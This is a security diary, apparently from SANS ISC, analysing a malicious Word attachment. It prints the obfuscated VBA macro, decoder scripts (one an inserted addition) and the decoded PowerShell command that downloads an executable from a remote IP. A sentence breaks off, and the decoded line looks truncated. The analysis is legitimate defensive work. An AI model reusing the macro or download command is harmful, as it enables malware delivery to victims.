Channel: SANS Internet Storm Center, InfoCON: green

Guest Diary: Xavier Mertens - Analyzing an MS Word document not detected by AV software, (Tue, Apr 7th)



Like everybody, I'm receiving a lot of spam every day but... I like it! All unsolicited messages I receive are stored in a dedicated folder for two purposes:

This helps me find new types of spam or new techniques used by attackers to deliver malicious content to our mailboxes. Today, I received an interesting Word document. I'm not sure whether it is a very common one, but I did a small analysis. The mail was based on a classic fake invoice notification:

From: Ollie Oconnor
To: xavier
Subject: 49933-Your Latest Documents from RS Components 570009054

The fake invoice was related to rswww.com, a UK online shop for electronic devices, components and IT-related stuff. The attached Word document was processed by my MIME2VT tool, but the VirusTotal score was 0/53 (https://www.virustotal.com/en/file/be7a959827ff33ab04195111600efb576eeac11904ef9b666386f56dafd8cfba/analysis/)! Interesting... It was too tempting to make some manual investigations. Using Didier Stevens' oledump.py:

$ ./oledump.py /tmp/20150331-A7740189461014146728299-1.doc
  1:       113 \x01CompObj
  2:      4096 \x05DocumentSummaryInformation
  3:      4096 \x05SummaryInformation
  4:      4096 1Table
  5:      4096 Data
  6:       490 Macros/PROJECT
  7:        65 Macros/PROJECTwm
  8: M   11613 Macros/VBA/Module1
  9: M    1214 Macros/VBA/ThisDocument
 10:      2932 Macros/VBA/_VBA_PROJECT
 11:      1165 Macros/VBA/__SRP_0
 12:        70 Macros/VBA/__SRP_1
 13:      8430 Macros/VBA/__SRP_2
 14:       103 Macros/VBA/__SRP_3
 15:       561 Macros/VBA/dir
 16:      5684 WordDocument

$ ./oledump.py -s 8 -v /tmp/20150331-A7740189461014146728299-1.doc
Attribute VB_Name = "Module1"
Sub sdfsdfdsf()
GVhkjbjv = chrw(49.5 + 49.5) & chrw(54.5 + 54.5) & chrw(50 + 50) & chrw(16 + 16) & chrw(23.5 + 23.5) & chrw(37.5 + 37.5) & chrw(16 + 16) & chrw(56 + 56) & chrw(55.5 + 55.5) & chrw(59.5 + 59.5) & chrw(50.5 + 50.5) & chrw(57 + 57) & chrw(57.5 + 57.5) & chrw(52 + 52) & chrw(50.5 + 50.5) & chrw(54 + 54) & chrw(54 + 54) & chrw(23 + 23) & chrw(50.5 + 50.5) & chrw(60 + 60) & chrw(50.5 + 50.5) & chrw(16 + 16) & chrw(22.5 + 22.5) & chrw(34.5 + 34.5) & chrw(60 + 60) & chrw(50.5 + 50.5) & chrw(49.5 + 49.5) & chrw(58.5 + 58.5) & chrw(58 + 58) & chrw(52.5 + 52.5) & chrw(55.5 + 55.5) & chrw(55 + 55) & chrw(40 + 40) & chrw(55.5 + 55.5) & chrw(54 + 54) & chrw(52.5 + 52.5) & chrw(49.5 + 49.5) & chrw(60.5 + 60.5) & chrw(16 + 16) & chrw(49 + 49) & chrw(60.5 + 60.5) & chrw(56 + 56) & chrw(48.5 + 48.5) & chrw(57.5 + 57.5) & chrw(57.5 + 57.5) & chrw(16 + 16)
GYUUYIiii = chrw(22.5 + 22.5) & chrw(55 + 55) & chrw(55.5 + 55.5) & chrw(56 + 56) & chrw(57 + 57) & chrw(55.5 + 55.5) & chrw(51 + 51) & chrw(52.5 + 52.5) & chrw(54 + 54) & chrw(50.5 + 50.5) & chrw(16 + 16) & chrw(20 + 20) & chrw(39 + 39) & chrw(50.5 + 50.5) & chrw(59.5 + 59.5) & chrw(22.5 + 22.5) & chrw(39.5 + 39.5) & chrw(49 + 49) & chrw(53 + 53) & chrw(50.5 + 50.5) & chrw(49.5 + 49.5) & chrw(58 + 58) & chrw(16 + 16) & chrw(41.5 + 41.5) & chrw(60.5 + 60.5) & chrw(57.5 + 57.5) & chrw(58 + 58) & chrw(50.5 + 50.5) & chrw(54.5 + 54.5) & chrw(23 + 23) & chrw(39 + 39) & chrw(50.5 + 50.5) & chrw(58 + 58) & chrw(23 + 23) & chrw(43.5 + 43.5) & chrw(50.5 + 50.5) & chrw(49 + 49) & chrw(33.5 + 33.5) & chrw(54 + 54) & chrw(52.5 + 52.5) & chrw(50.5 + 50.5) & chrw(55 + 55) & chrw(58 + 58) & chrw(20.5 + 20.5) & chrw(23 + 23)
hgFYyhhshu = chrw(34 + 34) & chrw(55.5 + 55.5) & chrw(59.5 + 59.5) & chrw(55 + 55) & chrw(54 + 54) & chrw(55.5 + 55.5) & chrw(48.5 + 48.5) & chrw(50 + 50) & chrw(35 + 35) & chrw(52.5 + 52.5) & chrw(54 + 54) & chrw(50.5 + 50.5) & chrw(20 + 20) & chrw(19.5 + 19.5) & chrw(52 + 52) & chrw(58 + 58) & chrw(58 + 58) & chrw(56 + 56) & chrw(29 + 29) & chrw(23.5 + 23.5) & chrw(23.5 + 23.5) & chrw(24.5 + 24.5) & chrw(28 + 28) & chrw(26.5 + 26.5) & chrw(23 + 23) & chrw(25.5 + 25.5) & chrw(28.5 + 28.5) & chrw(23 + 23) & chrw(24.5 + 24.5) & chrw(26 + 26) & chrw(28.5 + 28.5) & chrw(23 + 23) & chrw(25 + 25) & chrw(24.5 + 24.5) & chrw(23.5 + 23.5) & chrw(53 + 53) & chrw(57.5 + 57.5) & chrw(48.5 + 48.5) & chrw(60 + 60) & chrw(55.5 + 55.5) & chrw(28 + 28) & chrw(58.5 + 58.5) & chrw(23.5 + 23.5) & chrw(51.5 + 51.5) & chrw(25.5 + 25.5) & chrw(28.5 + 28.5) & chrw(49 + 49) & chrw(25 + 25) & chrw(49.5 + 49.5) & chrw(60 + 60) & chrw(23 + 23) & chrw(50.5 + 50.5) & chrw(60 + 60) & chrw(50.5 + 50.5) & chrw(19.5 + 19.5)
GYiuudsuds = chrw(22 + 22) & chrw(19.5 + 19.5) & chrw(18.5 + 18.5) & chrw(42 + 42) & chrw(34.5 + 34.5) & chrw(38.5 + 38.5) & chrw(40 + 40) & chrw(18.5 + 18.5) & chrw(46 + 46) & chrw(26 + 26) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(23 + 23) & chrw(49.5 + 49.5) & chrw(48.5 + 48.5) & chrw(49 + 49) & chrw(19.5 + 19.5) & chrw(20.5 + 20.5) & chrw(29.5 + 29.5) & chrw(16 + 16) & chrw(50.5 + 50.5) & chrw(60 + 60) & chrw(56 + 56) & chrw(48.5 + 48.5) & chrw(55 + 55) & chrw(50 + 50) & chrw(16 + 16)
shdfihiof = chrw(18.5 + 18.5) & chrw(42 + 42) & chrw(34.5 + 34.5) & chrw(38.5 + 38.5) & chrw(40 + 40) & chrw(18.5 + 18.5) & chrw(46 + 46) & chrw(26 + 26) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(23 + 23) & chrw(49.5 + 49.5) & chrw(48.5 + 48.5) & chrw(49 + 49) & chrw(16 + 16) & chrw(18.5 + 18.5) & chrw(42 + 42) & chrw(34.5 + 34.5) & chrw(38.5 + 38.5) & chrw(40 + 40) & chrw(18.5 + 18.5) & chrw(46 + 46) & chrw(26 + 26) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(23 + 23)
doifhsoip = chrw(50.5 + 50.5) & chrw(60 + 60) & chrw(50.5 + 50.5) & chrw(29.5 + 29.5) & chrw(16 + 16) & chrw(57.5 + 57.5) & chrw(58 + 58) & chrw(48.5 + 48.5) & chrw(57 + 57) & chrw(58 + 58) & chrw(16 + 16) & chrw(18.5 + 18.5) & chrw(42 + 42) & chrw(34.5 + 34.5) & chrw(38.5 + 38.5) & chrw(40 + 40) & chrw(18.5 + 18.5) & chrw(46 + 46) & chrw(26 + 26) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(26.5 + 26.5) & chrw(26 + 26) & chrw(25.5 + 25.5) & chrw(23 + 23) & chrw(50.5 + 50.5) & chrw(60 + 60) & chrw(50.5 + 50.5) & chrw(29.5 + 29.5)
JHGUgisdc = GVhkjbjv + GYUUYIiii + hgFYyhhshu + GYiuudsuds + shdfihiof + doifhsoip
IUGuyguisdf = Shell(JHGUgisdc, 0)
End Sub

The macro is quite simple: a shell command is obfuscated by multiple chrw() calls that generate substrings, which are concatenated and passed to the Shell() function to be executed. Let's write a small Python script to decode this. I

#!/usr/bin/python
import re
import sys

# Read the macro source (the oledump output) from stdin
data = sys.stdin.read()
# Each obfuscated character is written as chrw(a + b)
r = re.compile(r'chrw\((\S+) \+ (\S+)\)')
i = re.findall(r, data)
cmd = ''
for match in i:
    cmd = cmd + chr(int(float(match[0]) + float(match[1])))
print(cmd)

# ./oledump.py -s 8 -v /tmp/20150331-A7740189461014146728299-1.doc | ./decode.py
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile(http://185.39.149.21/jsaxo8u/g39b2cx.exe,%TEMP%\4543543.cab
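As an added example (not the diary's own script), a decoder that generalizes the approach above: it evaluates chrw()/chr() calls case-insensitively, decodes each obfuscated variable on its own, and follows the `X = A + B + C` concatenation so the result is the string actually handed to Shell() even when the attacker shuffles the variable definitions. The macro in SAMPLE_VBA is a constructed sample in the same style, not the one from the diary.

```python
import re

# One obfuscated character: chrw(49.5 + 49.5), ChrW(99) or Chr(32)
CHR_RE = re.compile(r'chrw?\(\s*([0-9.]+)(?:\s*\+\s*([0-9.]+))?\s*\)', re.I)
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$')   # name = <expression>
SHELL_RE = re.compile(r'\bShell\(\s*(\w+)', re.I)       # Shell(var, 0)

def decode_chr_expr(expr):
    """Turn a chain of chr()/chrw() calls into the string they build."""
    return ''.join(chr(int(round(float(a) + (float(b) if b else 0.0))))
                   for a, b in CHR_RE.findall(expr))

def decode_macro(vba):
    """Map every assigned variable to its decoded string, resolving
    'X = A + B' / 'X = A & B' concatenations of other variables in
    whatever order the attacker chose to define them."""
    strings, pending = {}, {}
    for line in vba.splitlines():
        m = ASSIGN_RE.match(line)
        if not m:
            continue
        name, expr = m.groups()
        if CHR_RE.search(expr):
            strings[name] = decode_chr_expr(expr)
        else:  # concatenation of variables (or an unrelated call like Shell)
            pending[name] = [p.strip() for p in re.split(r'[+&]', expr)]
    changed = True
    while changed:  # iterate until no pending concatenation can be resolved
        changed = False
        for name, parts in list(pending.items()):
            if all(p in strings for p in parts):
                strings[name] = ''.join(strings[p] for p in parts)
                del pending[name]
                changed = True
    return strings

def shell_command(vba):
    """Decoded command line handed to Shell(), or None if there is none."""
    m = SHELL_RE.search(vba)
    return decode_macro(vba).get(m.group(1)) if m else None

# Constructed sample in the diary's style (not the real macro): definitions
# are out of order and one call uses plain Chr() instead of chrw(a + b).
SAMPLE_VBA = '''Sub sdfsdfdsf()
part2 = chrw(23.5 + 23.5) & chrw(49.5 + 49.5) & Chr(32)
part3 = chrw(50.5 + 50.5) & chrw(49.5 + 49.5) & chrw(52 + 52) & chrw(55.5 + 55.5)
part1 = chrw(49.5 + 49.5) & chrw(54.5 + 54.5) & chrw(50 + 50) & chrw(16 + 16)
full = part1 + part2 + part3
ret = Shell(full, 0)
End Sub'''
```

Running shell_command(SAMPLE_VBA) yields "cmd /c echo"; feeding it the real oledump -s 8 -v output instead reproduces the diary's decoded command line.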

The web server at IP address 185.39.149.21 (located in Russia) is down at the moment... I'm keeping an eye on it...

--
Alex Stanford - GIAC GWEB GSEC,
Research Operations Manager,
SANS Internet Storm Center
/in/alexstanford

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
